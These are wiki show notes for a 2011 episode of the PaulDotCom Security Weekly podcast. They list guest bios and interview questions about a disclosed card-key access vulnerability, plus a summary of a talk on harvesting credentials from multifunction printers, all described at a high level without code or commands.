From Security Weekly Wiki
Jump to navigationJump to search


PaulDotCom Security Weekly - Episode 237 for Thursday March 31st, 2011.

  • SOURCE Boston on April 20 - 22- Paul and Larry will be there to hang out, talk beer and drink security.
  • SANS Classes
  • DerbyCon : Louisville, Kentucky – September 30th to October 2, 2011 with practically all of PaulDotCom in attendance. Catch our special training session on "How to survive a Dave Rel1k Man Hug".

Guest Interview: Michael Gough (pronounced **Goff**) and Ian Robertson ... The 'Thoughtful Hackers'

Ian is a security guy who spends his time trying to improve the security of his community, state and country. He is Director of Information Security with the State of Texas and 1/2 of the newly dubbed 'Thoughful Hackers'. You can catch simple, straight-forward and actionable advice through his website CyberSecurityGuy.com

Michael is a Senior Risk Analyst for the State of Texas and the local Austin BSides lead. When he's not beering and mountain biking, he spends his time blogging at HackerHurricane.com. He is also the author of the Syngress Published "Skype Me!" and "Video Conferencing over IP" books and is the 2nd half of the 'Thoughful Hackers' security research team.

Security researchers Michael Gough and Ian Robertson have identified a vulnerability impacting a widely popular security card key access system, and produced a first-of-its-kind exploit on a smartphone platform to prove it. Larry called "shenanigans" on this in Episode 235 and they're here to give us the skinny. They'll tell us about how they found the vulnerability, its exploitability, how the system is fundamentally flawed on several levels, what needs to be done and what they're doing to help protect others.

  • First off, sorry 'bout the shenanigans, but in this industry often times the proof is in the pudding, and videos are cool, but sometime get overlooked. How do you think the awareness on this issue is working?
  • So, to be frank, what is the issue, and what is Caribou all about?
  • Caribou is for the Android, but, will the underlying exploit work elsewhere?
  • We understand and respect the path you've chosen for disclosure, but how has the experience been working with CERT and the vendor? Bases on the status now, do you think the vendor is taking the issue seriously, and will you ever get to (if you choose to) release Caribou?
  • Tell us about some of the other technical challenges with accessing the technology to make the exploit work?
  • How pervasive is this type of problem in your opinion? How about other vendors? How about embedded, and access cotrol systems in general?
  • Why do you think that this particular instance is such a mess? Is it the vendor's fault? The installer's? The customer? Or just a lack of understanding all around?

Guest Tech Segment: Deral Heiland “PercX” and Pete Arzamendi “Bokojan” on Multi Function Printers and PRAEDA

Deral Heiland is a Senior Security Engineer for the foofus.net security team and is co-founder and president of the Ohio Information Security Forum. He's here tonight to discuss his ShmooCon presentation on Multi Function Printer pwnage.

In this presentation they go beyond the common printer issues and focus on harvesting data from multifunction printer (MFP) that can be leveraged to gain access to other core network systems. By taking advantage of poor printer security and vulnerabilities during penetration testing they were able to harvest a wealth of information from MFP devices including usernames, email addresses, authentication information including SMB, Email, LDAP passwords. Leveraging this information they have successful gained administrative access into core systems including email servers, file servers and Active directory domains on multiple occasions. They will also explore MFP device vulnerabilities including authentication bypass, information leakage flaws, and XSS flaws. Tying this altogether they will discuss the development of an automated process for harvesting the information from MFP devices with the beta release of their new tool ‘PRAEDA’.

Stories For Discussion

Larry's Stories

Revenge is a dish best served uploaded to youtube [1]

Paul's Stories